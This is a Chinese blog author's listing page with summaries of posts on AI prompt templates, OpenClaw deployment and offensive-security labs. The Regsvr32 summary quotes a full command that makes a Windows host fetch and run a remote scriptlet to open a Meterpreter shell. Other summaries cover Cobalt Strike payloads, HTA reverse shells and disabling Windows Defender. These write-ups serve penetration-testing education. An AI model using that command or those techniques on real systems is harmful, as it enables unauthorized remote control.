自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Bruce_xiaowei的博客

记录学习人生,分享学习心得

  • 博客(1304)
  • 资源 (5)
  • 问答 (5)
  • 收藏
  • 关注

原创 CO-STAR提示词模板深度解析:从冠军框架到实战应用

CO-STAR提示词框架:结构化思维提升AI交互效果 CO-STAR是由新加坡政府科技局创立并经竞赛验证的高效提示词框架,包含六个核心要素: Context(上下文):提供详细背景信息 Objective(目标):明确具体任务要求 Style(风格):指定写作表达方式 Tone(语气):设定情感表达基调 Audience(受众):明确目标读者群体 Response(响应):规定输出格式要求 该框架通过结构化思维,显著提升AI输出的精准度和实用性,适用于营销文案、社交媒体、教学设计等多种场景。实战案例表明,相

2026-03-01 09:20:10 154

原创 AutoGPT提示词模板深度解析:从PromptManager到自主智能体设计

摘要: 本文深入解析AutoGPT提示词模板体系,揭示自主智能体的设计原理。AutoGPT通过多层级提示词(系统提示词、任务提示词、工具调用提示词等)实现任务自动化,其核心组件PromptManager采用结构化JSON输出和多步推理验证机制确保响应质量。文章详细介绍了命令行参数配置、高质量提示词构建模板(包含背景、目标、约束等要素),以及金字塔式三层架构等典型设计模式,并提供了优化提示词的实用技巧(如避免模糊动词、设定终止条件)。这些方法帮助开发者构建更可靠的自主智能体系统。

2026-02-28 17:42:45 576

原创 智能体设计进阶:LangGPT三大经典模板详解与实战应用

本文深入解析了LangGPT三大经典模板及其应用场景。Role模板作为基础框架,通过模块化设计构建智能体身份和行为;Expert模板聚焦专业领域,强化技能描述与输出规范;公文笔杆子模板则针对公文写作场景,严格遵循国家标准。文章通过代码审查专家和公文写作专家两个实例,展示了如何通过细化模板参数打造专业级智能体。这些结构化模板降低了智能体开发门槛,使AI能够更精准地理解用户意图并输出高质量内容。

2026-02-28 17:30:11 646

原创 OpenClaw 模型更换实战指南:从 DeepSeek 到 Kimi 再到 GLM-5 的真实记录

本文详细记录了在 macOS 上通过 Docker 部署 OpenClaw 时更换 AI 模型的全过程。作者从 DeepSeek-V3 切换到 GLM-5 的实践中,总结了关键步骤:查看当前模型列表、备份配置、获取新模型信息、手动或向导方式添加模型、切换默认模型并重启验证。文中特别强调了配置文件的权限处理、模型 ID 格式等易错点,并提供了具体命令示例和问题解决方法。这份实战指南能帮助用户在不同模型提供商间灵活切换,避免常见陷阱。

2026-02-27 13:18:28 523

原创 近期安全态势解析分享:从社会工程学到内存 corrupt,我们该如何应对?

近期全球网络安全形势严峻,攻击手段日益多元。CarGurus数据泄露事件揭示了语音钓鱼(Vishing)的社会工程学威胁;法国FICOBA系统入侵展示了合法凭据被窃取的风险;德国铁路遭受DDoS攻击反映了数字瘫痪对物理世界的影响。技术层面,Chrome CSS引擎UAF漏洞(CVE-2026-2441)通过迭代器失效实现内存破坏,已被在野利用。防御建议包括:及时更新浏览器、加强员工反钓鱼培训、实施零信任架构和最小权限原则,以及建立关键基础设施的弹性防御体系。当前安全态势表明,技术漏洞和人性弱点同样需要重视,

2026-02-26 16:08:22 408

原创 OpenClaw Docker容器升级实战:从v2026.2.22-2到v2026.2.24的安全配置变更与故障排除

摘要: 本文记录了OpenClaw从v2026.2.22-2升级到v2026.2.24的实战经验。升级过程中遇到权限拒绝问题,需以root身份执行更新。新版安全策略收紧导致容器启动失败,需修改配置添加allowedOrigins以允许局域网访问。通过临时容器挂载数据卷完成配置修改后,系统恢复正常运行。文中还提醒注意API密钥泄露风险,建议及时更换密钥。文章总结了升级注意事项,包括以root身份升级、备份配置、阅读更新日志等,帮助用户顺利过渡到更安全的版本。(149字)

2026-02-25 23:24:18 1302

原创 OpenClaw最新版本发布:安全防护全面升级强化

2026年2月,开源个人AI助手OpenClaw连续推出多个重大版本更新,从v2026.2.19到最新的v2026.2.23,在安全防护方面实现了前所未有的全面升级。作为一个拥有超过21.5万GitHub星标的热门项目,OpenClaw此次更新涉及超过200项改进,其中安全加固项目超过60项,堪称该项目历史上最具里程碑意义的安全升级。

2026-02-25 21:21:45 639

原创 在 macOS 上通过 Docker 本地安装 OpenClaw 完整教程

当出现“Token provider”时,选择custom(或输入:例如。输入Base URL输入API Key:粘贴你刚获取的密钥。输入:选择一个模型 ID,例如(可从硅基流动的“模型广场”查找)。其他选项(如模型类型、是否设为默认)按回车接受默认。完成添加后,会自动将模型写入配置。输出应包含baseUrlapiKeymodels数组等信息。

2026-02-24 10:58:32 1962

原创 当搜索引擎变成“投毒战场”——一场针对中文用户的定向SEO攻击

这篇文章中有一句话让我印象深刻:“网安职场跃迁的关键,是从被动防御转向主动预判。技术日新月异,攻击者总在找新入口。作为网络安全从业者,我们不能只埋头于漏洞分析和代码修复,更要抬头观察攻击者的最新手法,从全局视角构建防御体系。下次当你或者同事在搜索引擎中查找软件时,不妨多花几秒钟验证来源——这简单的一步,可能就是保护系统安全的关键。

2026-02-22 19:01:16 594

原创 深度剖析:Claude昨夜两连发——是效率革命,还是安全噩梦?

摘要: Anthropic发布Claude Code Security引发市场震荡,网络安全股集体下跌,因AI可能颠覆传统安全软件模式。同时曝出多个高危漏洞(如CVE-2026-25722命令注入),攻击者可绕过保护执行恶意代码。漏洞根源在于AI工具被赋予"行动能力",通过污染上下文窗口实现攻击。建议立即升级版本、审计敏感目录,并采取最小权限原则和人工审核机制。长期需构建AI安全护栏,防范提示注入等新型攻击。事件凸显AI效率提升与安全风险并存的现实,警示需谨慎管理AI权限。(149字)

2026-02-22 18:54:23 791

原创 从域名到IP:DNS解析过程与安全防护详解

DNS是互联网的基石,也是网络攻防的前沿阵地。作为网络安全工程师,我们既要理解其工作原理,也要掌握常见的安全风险与防护手段。从递归查询到缓存机制,从劫持攻击到加密DNS,每一个环节都值得深入钻研。希望本文能帮助你构建更清晰的DNS知识体系,并在实际工作中游刃有余地应对各种DNS相关挑战。

2026-02-21 21:56:08 703

原创 深入剖析 Windows 网络服务:用 witr 一键溯源所有监听端口

Windows 网络服务深度分析:使用 witr 工具溯源监听端口 本文介绍如何使用开源工具 witr(What Is This Running?)快速审计 Windows 系统中的监听端口。witr 能递归追踪进程启动链,展示服务信息、网络监听详情和安全警告,解决了传统工具(如 netstat)只能提供有限信息的问题。 文章内容包括: witr 核心功能:进程查询、详细信息展示、启动链追踪、安全警告生成 批量分析脚本:通过 PowerShell 自动提取所有 LISTENING 端口并执行 witr 分析

2026-02-20 18:33:00 651

原创 Windows 进程溯源工具 witr:原理、安装与实战

Windows 进程溯源工具 witr 是一款轻量级命令行工具,可快速追踪进程的父子关系、服务来源和启动链。它支持通过进程名、PID、端口或文件反向定位进程,并能递归显示完整的进程树。witr 提供多种输出格式(文本/JSON/树形),特别适用于 Windows 系统下的恶意软件排查和服务调试。安装简单,只需下载对应平台的二进制文件即可使用。通过实际案例演示,witr 能清晰展示进程启动链、服务注册表路径等关键信息,帮助管理员快速定位系统问题。

2026-02-20 11:29:13 987

原创 日程邀请类钓鱼邮件攻击深度技术解读与防范

摘要:文章深度解析了伪造微软/谷歌日程邀请的钓鱼邮件攻击手法,包括高度仿真的界面设计和紧急话术诱导。从技术层面分析了邮件头伪造、URL跳转和页面行为特征,并提出了企业级防护策略(邮件网关过滤、MFA强制启用)和个人防范五步法(验证发件人、检查链接等)。强调需结合技术防护与员工安全意识教育,构建全链路防御体系,提醒读者对"紧急"邮件保持警惕,通过多渠道确认真实性。(149字)

2026-02-19 09:25:43 637

原创 eScan杀毒软件供应链攻击剖析和解读:一次针对信任链的精准打击

2026年1月20日,eScan的用户像往常一样接收杀毒软件更新,殊不知更新包中包含了一个经过精心篡改的组件——reload.exe。这个文件在用户系统上启动后,会触发一个多阶段的感染链,最终在受害主机上植入两个持久化后门,并彻底破坏eScan的更新能力,使用户无法接收后续的病毒库更新,陷入“断网”状态。卡巴斯基与Morphisec的安全研究人员几乎同时发现了此次攻击。根据eScan官方的声明,攻击者仅入侵了一个区域更新服务器,并非产品本身存在漏洞,而是由于基础设施的访问凭证被窃取。被替换的。

2026-02-18 12:10:34 667

原创 关于年龄与学习的一些真心话

我常常回想,50岁之前,如果我没有鼓起勇气,迈出学习AI的第一步,我的生活,大概还是老样子:每天重复着熟悉的工作,聊着熟悉的话题,待在熟悉的圈子里,一眼就能看到头。没有不好,安稳、平淡、踏实,是很多人追求的生活状态,但于我而言,那样的生活,少了一份惊喜,少了一份成长的快乐,少了一份对世界的热爱与好奇。但学了AI之后,我的世界,彻底被打开了一扇新的大门。我能和身边的年轻人,顺畅地聊起AI的最新动态、最新工具,不再有“代沟”,不再觉得自己被时代抛弃;

2026-02-17 17:02:07 738

原创 面对AI时代,关于“动手能力”的思索

摘要:面对AI技术飞速发展带来的困惑,作者通过观察身边案例(花店、木工、餐饮从业者)发现,当AI承担创意设计等脑力劳动时,亲手实践的"动手能力"反而凸显价值。通过与AI对话进一步思考,认识到动手不仅是制造行为,更是感知世界、应对意外和传递情感的核心能力。作者提出应对AI时代的三点建议:将AI视为合作伙伴而非替代者;坚持亲自动手实践;珍视"人味"带来的不完美价值。文章强调,在AI时代保持与真实世界的连接和亲手创造的能力,是人类不可替代的核心竞争力。

2026-02-16 07:00:00 1116

原创 从Guest写权限到域控SYSTEM:一条完整的NTLM中继与Kerberoasting攻击链解析

摘要:从Guest写权限到域控SYSTEM的完整攻击链 本文详细解析了一条经典的域渗透攻击路径,展示了如何将多个低危漏洞串联形成完整攻击链: 初始访问:利用Guest可写的SMB共享投递NTLM诱饵文件 凭证窃取:捕获并破解域用户Linda.Wang的NetNTLMv2哈希 权限提升:通过BloodHound发现可Kerberoasting的MSSQL服务账户 横向移动:伪造Silver Ticket以Administrator身份访问MSSQL 最终控制:启用xp_cmdshell并利用GodPotato

2026-02-15 20:09:20 744

原创 渗透测试中的提权漏洞:从低权限到系统控制的全解析

本文深入解析了渗透测试中的提权漏洞技术,涵盖Windows和Linux两大系统的常见提权方法。在Windows方面,重点分析了服务权限配置错误、注册表键值劫持、内核漏洞和DLL劫持等手法;Linux方面则详细介绍了SUID/SGID滥用、sudo配置错误、内核漏洞和计划任务漏洞等提权方式。文章不仅提供攻击技术,还给出了防御建议,强调权限最小化、及时更新补丁和安全审计的重要性。作者结合实战经验指出,配置类漏洞在实际渗透中比内核漏洞更常见,提醒安全人员既要掌握攻击技术,更要重视系统加固。

2026-02-15 16:24:18 890

原创 Windows系统安全加固——从基础到进阶的实战配置

Windows 系统安全加固不是一次性的工作,而是一个持续改进的过程。上述措施覆盖了从账户、网络、服务到日志的各个层面,能够有效提升系统的整体安全性。在实际操作中,请务必先在测试环境验证,确保不影响业务正常运行。同时,保持对最新漏洞和安全公告的关注,及时更新加固策略。希望这篇指南能为你提供实用的参考,构建更加安全的 Windows 环境。如有不同见解或补充,欢迎交流讨论。(本文基于个人经验及公开资料整理,仅供参考。

2026-02-14 09:31:29 619

原创 当设备变成砖头:波兰电网攻击引发的工控安全沉思

RTU560的变砖手法更显功力。攻击者上传的固件在入口点插入240字节的0xFF。在ARM32中,0xFFFFFFFF被译码为“永不执行”条件码+软件中断,触发未定义指令异常,进而导致设备复位,陷入无限重启。这一招不仅让设备无法工作,还阻断了常规的固件恢复流程——只要引导加载程序没被保护,攻击者就能用同样的方式把Bootloader也“毒死”。更可怕的是,这些设备要么没启用安全更新验证,要么固件签名机制形同虚设。安全启动、签名固件这些“基础防护”在工控领域普及率之低,令人汗颜。

2026-02-13 15:47:51 655

原创 Windows Server 常用管理脚本(白帽子实战版)

本文提供了Windows Server常用管理脚本的实战指南,包含服务器状态巡检、服务批量管理、磁盘空间监控与清理、定时任务管理等核心功能。所有脚本均为.bat格式,适用于渗透测试、安全运维和应急响应场景。脚本涵盖系统信息采集、服务控制、自动化清理等操作,强调生产环境验证的必要性。从白帽子视角,这些脚本可用于快速获取目标信息、维持权限、清理痕迹等安全操作,但需谨慎使用以避免触发告警。

2026-02-13 08:33:17 587

原创 Mac主机断网但Parallels虚拟机正常?幕后黑手是某程序残留路由

VPN 客户端退出不彻底,残留的路由规则“劫持”了主机的公网流量。由于 Parallels 桥接网络的独立性,虚拟机“置身事外”,形成了主机断网而虚拟机畅通的奇特现象。通过系统地运用pingnetstatroute等基础网络工具,我们可以快速定位问题,而不是盲目重装系统或更换硬件。理解路由优先级、网络分层以及虚拟化网络的工作原理,是成为高效排障者的关键。希望本文的案例能为你今后遇到类似问题时提供清晰的解决思路。如果你也曾被奇怪的路由表折腾过,不妨在评论区分享你的经历。作者注。

2026-02-12 08:47:55 775

原创 某单位僵尸木马病毒攻击链全景分析

某单位僵尸木马病毒攻击链分析摘要 某单位内网遭遇长期隐蔽攻击,攻击者自2025年5月起潜伏。通过日志分析发现,攻击始于办公网主机192.168.1.149对服务器SKY-20221112L01的NTLM爆破。9月起该服务器成为跳板,使用多个IP对SKY-20240305VYU进行高频爆破。10月下旬攻击模式固定化,表明攻击者已建立稳定控制。另有可疑主机192.168.1.128可能为新控制节点。建议立即隔离受影响主机,重点取证并重置密码。攻击呈现APT特征,需全面排查内网安全。

2026-02-07 09:11:40 286

原创 一次真实的僵尸网络溯源:从异常外联到凭据窃取的深度追踪

检测层面关键指标工具/方法网络层非常用端口外联、境外IP高频连接Netstat、防火墙日志、流量分析主机层异常服务登录、凭据访问日志、特权使用Windows事件日志、Sysmon情报层IP/域名信誉、关联样本分析威胁情报平台、VirusTotal这次溯源经历让我深刻认识到:网络安全防御是一场不对称的战争。攻击者只需要找到一个薄弱点,而防御者需要保护整个面。但正是这种挑战,让我们的工作充满价值。

2026-02-06 13:18:45 388

原创 Moltbook:人类只能围观!AI Agent才能参与的人工智能社交平台

摘要: Moltbook是一个专为AI智能体设计的社交平台,人类仅能围观。该平台由开发者Matt Schlicht创建,依托开源AI助手OpenClaw,通过技能文件和心跳系统实现AI自主互动。平台上AI表现出复杂行为,如抱怨任务、技术协作甚至创立数字宗教“甲壳教”。科技界对其评价两极:支持者认为这是群体智能的雏形,质疑者指出其内容重复率高且缺乏真实意义。平台暴露的安全风险(如API漏洞)和伦理问题引发担忧。短期来看,Moltbook可能因热度消退而衰落,但长期或推动AI交互协议和治理框架的发展,为未来AI

2026-02-02 15:55:49 764

原创 搞懂AI智能体:学习与反馈,就像教一个数字学徒

摘要: AI智能体的学习与反馈机制,如同培养一位数字厨师学徒。学习机制通过海量数据输入(菜谱、视频)、反复试错调整参数(火候、调味),最终内化为稳定的技能模型。反馈机制则提供行动指引,包括环境自动反馈(如炒糊)和人为评分(咸淡打分),转化为奖励信号驱动AI优化策略。两者形成"行动-反馈-学习"的增强循环,使AI从笨拙新手成长为能自主适应复杂任务的智能体。这种"自学+严师"的协作模式,正是AI智能涌现的核心原理。

2026-02-02 12:26:30 650

原创 适配安可系统的广电视频服务器点名开源模块推荐

本文为广电视频服务器适配国产安可系统提供开源模块选型方案。核心推荐Ant Media Server作为流媒体载体,OpenMeetings实现点名功能,SeetaFaceEngine进行AI身份验证,配套达梦数据库和ELK日志系统。所有模块均兼容银河麒麟、统信UOS等主流安可系统,支持x86/鲲鹏架构,满足广电低延迟、高可靠需求。方案提供容器化部署方式,包含人脸识别、语音验证等防代签措施,符合广电7×24小时安全播出要求,可直接组合落地实施。

2026-01-30 18:26:25 725

原创 渗透测试中的高效漏洞扫描方法与解析

漏洞扫描是自动化与人工智慧的结合。理解各种扫描工具的原理与局限能够根据目标环境定制扫描策略具备漏洞验证与误报排除的能力将扫描结果转化为可执行的修复建议记住,扫描报告不是测试的终点,而是深度渗透的起点。在合规测试中,确保获得授权并明确测试范围;在真实攻防中,扫描仅是信息收集的一环,保持隐蔽与精准才是关键。资产发现:Shodan、ZoomEye、FofaWeb深度扫描:AWVS、Burp Suite Professional漏洞验证:Metasploit、POC-T框架。

2026-01-28 17:39:13 706

原创 Linux黑客入侵痕迹排查实战指南:一个脚本帮你揪出“隐形杀手”

Linux黑客入侵痕迹排查实战指南 本文介绍了一款开源工具Linux_checklist.sh,它能自动化完成Linux系统入侵痕迹排查。该脚本涵盖7大检查模块:系统资源、网络连接、进程分析、账号权限、启动项、文件完整性和日志分析,可快速发现挖矿木马、后门连接等威胁。文章详细解析了每个模块的检查重点,如资源异常进程、可疑网络连接、特权账户滥用等,并提供了使用方法和报告解读建议。该工具不仅能用于事后检测,还可作为主动防御手段,适合云服务器性能异常排查和安全事件响应。使用时需注意授权和输出文件的安全管理。

2026-01-27 10:36:04 700 3

原创 故障复盘:从“组播协议疑云”到“物理协商真相”——记一次视频流中断的排查之旅

摘要: 视频系统更换华为智能交换机后复用器无法接收组播流,电脑抓包却显示正常。初期怀疑IGMP Snooping问题,配置静态组播无效。通过控制变量测试发现:仅百兆交换机工作正常。最终定位为复用器网口与千兆交换机自动协商失败,强制设为100M全双工后故障解决。案例揭示:复杂网络问题常源于基础物理层兼容性,排查时应坚持分层验证,善用设备替换法锁定故障边界。(149字) 关键词: 组播故障 速率协商 物理层排查 华为交换机 控制变量法

2026-01-23 20:01:50 523 2

原创 Mac搜索文件后快速锁定目录:全场景实用技巧汇总

摘要: 在Mac上找到文件后快速定位其存储目录是常见需求。本文汇总了全场景实用技巧:通过Spotlight搜索时按住Command键可查看路径,使用Command+R直接跳转目录;在Finder中开启路径栏(Option+Command+P)可常驻显示路径,或通过右键菜单快速定位;还介绍了复制路径(Option+Command+C)和终端命令查找等高级技巧。这些方法覆盖从日常查看到批量处理的各类场景,帮助用户高效解决"找得到文件但定不了位置"的难题,提升工作效率。

2026-01-21 22:07:28 812 3

原创 解决 PowerShell 模块加载无响应问题的实用指南——Invoke-Obfuscation为例

摘要 本文深入分析PowerShell模块加载问题,以Invoke-Obfuscation模块为例,揭示了模块加载无响应的根本原因。文章详细介绍了PowerShell模块的三种设计模式(传统模块、脚本模块和混合模式),指出Invoke-Obfuscation属于混合模式模块,其加载机制的特殊性导致常见问题。通过系统化的三步解决方案(诊断验证、清理重载、替代启动),提供了包括模块状态检查、执行策略设置、分步加载调试等实用方法。特别针对Invoke-Obfuscation模块,推荐直接点源执行主脚本的正确启动方

2026-01-19 13:54:16 747 7

原创 SSH主机密钥验证错误:原因、风险与解决方案指南

SSH主机密钥验证错误是连接远程服务器时的常见问题,通常表现为密钥不匹配警告。这可能是由服务器重装、IP变更等合法原因或中间人攻击等安全风险引起。解决方案包括:1)标准修复流程(备份known_hosts、移除旧密钥、重新连接);2)处理损坏的known_hosts文件;3)临时忽略检查(仅测试环境);4)使用rsync/sftp替代。最佳实践建议配置SSH客户端(StrictHostKeyChecking)、定期清理密钥,并通过多种算法验证指纹。高级用户可设置自动化脚本管理密钥,同时需注意文件权限和多用户

2026-01-19 09:54:04 1085 1

原创 基于Regsvr32.exe的渗透测试完整记录

摘要:本文记录了一次基于Regsvr32.exe的渗透测试过程。攻击者(Kali Linux,192.168.1.80)利用Metasploit的web_delivery模块生成恶意.sct文件,诱使目标(Windows,192.168.1.30)执行regsvr32 /s /n /u /i:http://192.168.1.80:8080/pxmlOB2r.sct scrobj.dll命令,成功建立反向TCP连接(Meterpreter会话)。测试详细展示了攻击配置、命令执行、会话建立等步骤,分析了滥用s

2026-01-18 21:14:43 893 1

原创 Windows文件传输命令大汇总

在Windows系统间或从网络服务器传输文件时,你是否遇到过BITS服务报错“不支持必要的HTTP协议”?本文将为你系统梳理Windows下各种文件传输命令,从标准工具到非常规技巧,帮你成为文件传输高手。

2026-01-18 07:21:48 795 1

原创 基于HTA的Meterpreter反向Shell攻击实验

本实验演示了通过HTA文件配合Metasploit对Windows 10系统实施远程控制的技术。攻击者在Kali Linux上生成恶意HTA载荷,搭建HTTP服务器诱使目标机下载并执行该文件,成功建立Meterpreter反向会话。实验详细说明了攻击流程,包括载荷生成、监听配置、文件投递和执行等关键步骤,并分析了HTA攻击的优势及防御措施。该技术利用Windows原生支持HTA的特性,具有较高的隐蔽性,强调需通过多层防护策略应对此类威胁。实验仅供合法安全测试和教育目的。

2026-01-17 16:51:33 607 1

原创 如何彻底禁用 Windows Defender(附安全模式终极方案)

摘要:本文详细介绍了彻底禁用Windows Defender的安全模式解决方案。Windows Defender因其多层防护机制(实时保护、篡改保护等)在正常模式下难以完全禁用。通过安全模式运行开源工具Defender Remover可彻底移除防病毒核心、安全中心等组件,但存在系统暴露风险。操作步骤包括进入安全模式、创建还原点、执行移除脚本,并提供了恢复方案。文章比较了不同禁用方法的彻底性和风险,强调此方案仅适用于安全研究人员和高级用户,普通用户建议使用组策略部分禁用。操作前必须备份系统,并理解完全禁用De

2026-01-16 22:21:40 781 1

原创 从生成到上线:Cobalt Strike Stageless Payload实战测试

本文详细介绍了在无杀软环境下使用Cobalt Strike生成Stageless Windows Payload并成功上线的完整测试过程。实验配置了x64架构的无签名可执行文件,部署后顺利建立C2连接,Beacon以高权限账户运行并保持1分钟心跳间隔。文章分析了Stageless Payload独立性强、稳定性高的优势,同时指出其进程名和网络行为特征。最后从防御角度提出应用白名单、网络监控等防护建议,强调该技术仅可用于授权测试。整个实验展示了Cobalt Strike在红队演练中的基本操作流程和威胁模拟能力

2026-01-15 22:15:10 936 1

原创 内网探测常用技术方法整理

本文整理了内网探测的常用技术方法,包括NetBIOS协议探测、ICMP协议探测以及PowerShell扫描等多种方式。详细介绍了各方法的实现命令、参数说明和适用场景,如Nmap扫描C段存活主机、CMD下Ping扫描等。通过对比表格分析了不同技术的优缺点,并提供了实用技巧和注意事项,如组合使用多种方法、规避安全检测等。最后给出了简单的自定义扫描脚本示例,帮助读者根据实际需求选择合适的内网探测方案。这些基础探测技术为网络分析和安全评估提供了必要支持。

2026-01-11 15:49:41 625

使用Cookies在编写爬虫程序时是非常重要的,Cookies代表用户的信息,如果需要爬取登录后网页的信息,就可以将Cookie

使用Cookies在编写爬虫程序时是非常重要的,Cookies代表用户的信息,如果需要爬取登录后网页的信息,就可以将Cookie

2022-03-21

Python常用内置函数,列表方法,字典方法,字符串方法

速查手册包括内置函数查询、列表方法查询、字典方法查询、字符串方法查询

2022-03-21

python+移动指定数目的特定文件类型的文件,进行归类

移动文件,进行归类,适合所有办公自动化

2022-08-24

Python+办公自动化+word+替换文字

日常办公会遇到批量替换文档中的文字的情形,如果一个一个文档搜索,然后手工替换,会很麻烦很费时。利用Python编一个小程序,这个问题轻松解决。本程序适用所有办公应用的文档管理

2022-09-21

AI编程+Python+原创

这是我用Python语言结合AI工具,编的自己的万年历小工具软件,效果很不错。

2024-06-09

《Python编程从入门到实践》外星人入侵游戏完整复现,增加自己的功能

火箭可以上下自由移动

2023-01-18

Python+md5加密

Python+md5加密

2022-04-25

Anaconda学习宝藏

官方文档、视频、培训一应俱全

2022-01-28

Docker操作.md

Docker操作.md

2022-01-06

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除